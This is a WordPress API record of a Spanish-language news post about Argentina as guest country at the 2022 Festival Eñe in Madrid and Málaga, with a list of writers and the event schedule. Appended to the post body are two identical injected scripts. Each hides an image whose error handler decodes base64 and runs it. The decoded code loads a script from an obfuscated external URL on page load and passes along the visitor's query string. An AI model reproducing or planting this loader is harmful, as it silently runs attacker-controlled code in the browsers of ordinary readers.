{"id":1748,"date":"2022-11-07T22:24:26","date_gmt":"2022-11-08T01:24:26","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1748"},"modified":"2025-08-14T00:30:54","modified_gmt":"2025-08-14T03:30:54","slug":"argentina-es-pais-invitado-en-el-festival-ene-de-espana","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1748","title":{"rendered":"Argentina es Pa\u00eds Invitado en el Festival E\u00f1e de Espa\u00f1a"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#072c42\"><em>Del 11 al 27 de noviembre, en Madrid y M\u00e1laga, se llevar\u00e1 a cabo el Festival E\u00f1e de literatura iberoamericana. En esta 14\u00b0 edici\u00f3n del evento,\u00a0<strong>Argentina es \u201cPa\u00eds Invitado\u201d y participa del evento con la presencia de 13 escritoras y escritores argentinos<\/strong>.<\/em><\/h4>\n\n\n\n<p>&nbsp;Esta iniciativa es impulsada por la Canciller\u00eda argentina a trav\u00e9s de la Direcci\u00f3n de Asuntos Culturales y se enmarca en el&nbsp;<strong>Plan Libro Argentino<\/strong>, una pol\u00edtica p\u00fablica que tiene como objetivo principal la proyecci\u00f3n de nuestra cultura en el exterior, principalmente a partir de la internacionalizaci\u00f3n de nuestras publicaciones y sus autores y autoras.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/whatsapp_image_2022-11-07_at_17.10.50-1024x682.jpeg\" alt=\"\" class=\"wp-image-1749\" width=\"-267\" height=\"-178\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/whatsapp_image_2022-11-07_at_17.10.50-1024x682.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/whatsapp_image_2022-11-07_at_17.10.50-300x200.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/whatsapp_image_2022-11-07_at_17.10.50-768x512.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/whatsapp_image_2022-11-07_at_17.10.50-696x464.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/whatsapp_image_2022-11-07_at_17.10.50-1068x712.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/whatsapp_image_2022-11-07_at_17.10.50-630x420.jpeg 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/whatsapp_image_2022-11-07_at_17.10.50.jpeg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div>\n\n\n<p>Sobre la presencia de nuestro pa\u00eds en el Festival,<strong>&nbsp;Paula V\u00e1zquez, Directora de Asuntos Culturales&nbsp;<\/strong>expres\u00f3 que \u201ces para nosotros una alegr\u00eda y, sobre todo, un importante reconocimiento a la gran proyecci\u00f3n que la literatura argentina ha tenido en el mundo entero en los \u00faltimos a\u00f1os y, en forma destacada, en la \u00faltima d\u00e9cada. Nuestra presencia forma parte de las acciones del Plan Libro Argentino, una estrategia que impulsamos desde la Canciller\u00eda argentina, que busca posicionar en el mundo a nuestro mercado editorial, autoras y autores consagrados y emergentes\u00bb.<\/p>\n\n\n\n<p>La comitiva de escritoras y escritores argentinos que participar\u00e1 del festival en el marco del impulso de la Canciller\u00eda argentina est\u00e1 conformada por&nbsp;<strong>Gabriela Cabez\u00f3n C\u00e1mara, Federico Falco, Pablo Katchadjian, Lucila Lijtmaer, Mar\u00eda Negroni, Andr\u00e9s Neumann, Clara Obligado y Eduardo Sacheri. Adem\u00e1s, estar\u00e1n presentes: Mart\u00edn Caparr\u00f3s, Valeria Correa, Diego Mattarucco, Daniel Mordzinski y Mariano Peyrou.<\/strong><\/p>\n\n\n\n<p>Tambi\u00e9n, desde la Direcci\u00f3n de Asuntos Culturales, se gestion\u00f3 el concierto de clausura del Festival, que ser\u00e1 llevado a cabo por&nbsp;<strong>Isabel de Sebasti\u00e1n<\/strong>. En este recital, que tambi\u00e9n cuenta con el apoyo del Instituto Cervantes, la cantante rendir\u00e1 homenaje a la escritora y activista Mar\u00eda Teresa Le\u00f3n, primera mujer de Rafael Alberti, con quien vivi\u00f3 durante casi medio siglo, ejerciendo ambos una gran influencia en los c\u00edrculos intelectuales y art\u00edsticos de Argentina, pa\u00eds del exilio del poeta espa\u00f1ol. Por su parte, el m\u00fasico&nbsp;<strong>Javier Calequi<\/strong>&nbsp;presentar\u00e1 canciones de Gualicho, su LP debut, y de la banda sonora de La Jefa, del director Fran Torres y algunas novedades de su pr\u00f3ximo proyecto.<\/p>\n\n\n\n<p>El Festival E\u00f1e celebra en esta ocasi\u00f3n su edici\u00f3n m\u00e1s extensa, con la presencia de 150 autores y autoras, la participaci\u00f3n de 32 sedes en Madrid y M\u00e1laga, y la direcci\u00f3n literaria de&nbsp;<strong>Lola Larumbe<\/strong>, referente del circuito librero espa\u00f1ol. Su propuesta reivindica el poder de la literatura como el acto m\u00e1s natural de la creaci\u00f3n y su car\u00e1cter de fiesta y reuni\u00f3n en torno a la palabra. M\u00e1s informaci\u00f3n sobre Festival E\u00f1e en:&nbsp;<a href=\"http:\/\/www.lafabrica.com\/festivalene\" target=\"_blank\" rel=\"noreferrer noopener\">www.lafabrica.com\/festivalene<\/a><\/p>\n\n\n\n<p>La participaci\u00f3n de la comitiva argentina en el marco de la Canciller\u00eda argentina es posible gracias al apoyo de YPF y Fundaci\u00f3n Medif\u00e9. En este sentido, Daniela Gutierrez, Gerenta General de Fundaci\u00f3n Medif\u00e9, explic\u00f3 que \u201cdesde la Fundaci\u00f3n elegimos estar en el festival como un aporte m\u00e1s a la industria del libro y la literatura argentina. Vemos en el Festival E\u00f1e una valiosa oportunidad para fomentar di\u00e1logos tan necesarios. Venimos apoyando la literatura argentina porque sabemos que escribir y leer hacen bien. Y como Fundaci\u00f3n de una empresa de salud, nos importa y nos compromete esta causa\u201d.<\/p>\n\n\n\n<p><strong>PROGRAMACI\u00d3N MADRID:<\/strong><strong>&nbsp;Argentina, Pa\u00eds Invitado<\/strong><\/p>\n\n\n\n<p><strong>S\u00e1bado 12 \/ Biblioteca Regional&nbsp;<\/strong><\/p>\n\n\n\n<p>GABRIELA CABEZ\u00d3N C\u00c1MARA y PATRICIO PRON<\/p>\n\n\n\n<p><strong>S\u00e1bado 12 \/ Biblioteca Regional&nbsp;<\/strong><\/p>\n\n\n\n<p>LUC\u00cdA LIJTMAER y LAURA FERN\u00c1NDEZ<\/p>\n\n\n\n<p><strong>Lunes 14 \/ Casa Am\u00e9rica&nbsp;<\/strong><\/p>\n\n\n\n<p>ANDR\u00c9S NEUMAN y NONA FERN\u00c1NDEZ<\/p>\n\n\n\n<p><strong>Mi\u00e9rcoles 16 \/ Biblioteca Nacional&nbsp;<\/strong><\/p>\n\n\n\n<p>ALEJANDRO ZAMBRA y PABLO KATCHADJIAN<\/p>\n\n\n\n<p>Modera: PAULA V\u00c1ZQUEZ<\/p>\n\n\n\n<p><strong>Viernes 18 \/ C\u00edrculo de Bellas Artes&nbsp;<\/strong><\/p>\n\n\n\n<p>CLARA OBLIGADO y FEDERICO FALCO<\/p>\n\n\n\n<p><strong>Viernes 18 \/ C\u00edrculo de Bellas Artes&nbsp;<\/strong><\/p>\n\n\n\n<p>ALICIA GIM\u00c9NEZ BARTLETT Y EDUARDO SACHERI<\/p>\n\n\n\n<p><strong>S\u00e1bado 19 \/ C\u00edrculo de Bellas Artes&nbsp;<\/strong><\/p>\n\n\n\n<p>MAR\u00cdA NEGRONI y BENJAM\u00cdN PRADO<\/p>\n\n\n\n<p>Cierre M\u00fasical: ISABEL DE SEBASTI\u00c1N y CALEQUI<\/p>\n\n\n\n<p><strong>PROGRAMACI\u00d3N ESPECIAL MADRID:<\/strong><strong>&nbsp;Visitas a Librer\u00edas<\/strong><\/p>\n\n\n\n<p><strong>Viernes 11 de noviembre<\/strong><\/p>\n\n\n\n<p>19.00H | LA MISTRAL<\/p>\n\n\n\n<p>Encuentro con Gabriela Cabez\u00f3n C\u00e1mara<\/p>\n\n\n\n<p><strong>Martes 15 de noviembre<\/strong><\/p>\n\n\n\n<p>19.00H | CAFEBRER\u00cdA AD HOC<\/p>\n\n\n\n<p>Encuentro con Andr\u00e9s Neuman&nbsp;<\/p>\n\n\n\n<p><strong>Jueves 17 de noviembre<\/strong><\/p>\n\n\n\n<p>19.00H | LATA PEINADA<\/p>\n\n\n\n<p>Encuentro con Federico Falco y Pablo Katchadjian<\/p>\n\n\n\n<p>19.00H | ESTUDIO EN ESCARLATA<\/p>\n\n\n\n<p>Encuentro con Eduardo Sacheri<\/p>\n\n\n\n<p><strong>Viernes 18 de noviembre<\/strong><\/p>\n\n\n\n<p>19.00H | CAFEBRER\u00cdA AD HOC<\/p>\n\n\n\n<p>Encuentro con Mar\u00eda Negroni<\/p>\n\n\n\n<p><strong>M\u00e1s autores argentinos<\/strong><\/p>\n\n\n\n<p><strong>Martes 15 \/ Instituto Cervantes<\/strong><\/p>\n\n\n\n<p>MART\u00cdN CAPARR\u00d3S y JUAN CRUZ<\/p>\n\n\n\n<p><strong>Jueves 17 \/ Fundaci\u00f3n Casa de M\u00e9xico en Espa\u00f1a<\/strong><\/p>\n\n\n\n<p>VALERIA CORREA y CRISTINA RIVERA GARZA<\/p>\n\n\n\n<p><strong>S\u00e1bado 19 \/ C\u00edrculo de Bellas Artes<\/strong><\/p>\n\n\n\n<p>DIEGO MATTARUCCO y otros autores por confirmar en un recital po\u00e9tico.<\/p>\n\n\n\n<p><strong>Viernes 25 \/ Centro Cultural Generaci\u00f3n del 27 (M\u00e1laga)<\/strong><\/p>\n\n\n\n<p>DANIEL MORDZINSKI y CARLOS PARDO<\/p>\n\n\n\n<p><strong>S\u00e1bado 26 \/ Centro Cultural Generaci\u00f3n del 27 (M\u00e1laga)<\/strong><\/p>\n\n\n\n<p>MARIANO PEYROU y SARA MESA<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Del 11 al 27 de noviembre, en Madrid y M\u00e1laga, se llevar\u00e1 a cabo el Festival E\u00f1e de literatura iberoamericana. En esta 14\u00b0 edici\u00f3n del evento,\u00a0Argentina es \u201cPa\u00eds Invitado\u201d y participa del evento con la presencia de 13 escritoras y escritores argentinos. &nbsp;Esta iniciativa es impulsada por la Canciller\u00eda argentina a trav\u00e9s de la Direcci\u00f3n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1750,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,13],"tags":[],"class_list":{"0":"post-1748","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1748"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1748"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1748\/revisions"}],"predecessor-version":[{"id":7285,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1748\/revisions\/7285"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1750"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1748"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1748"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1748"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}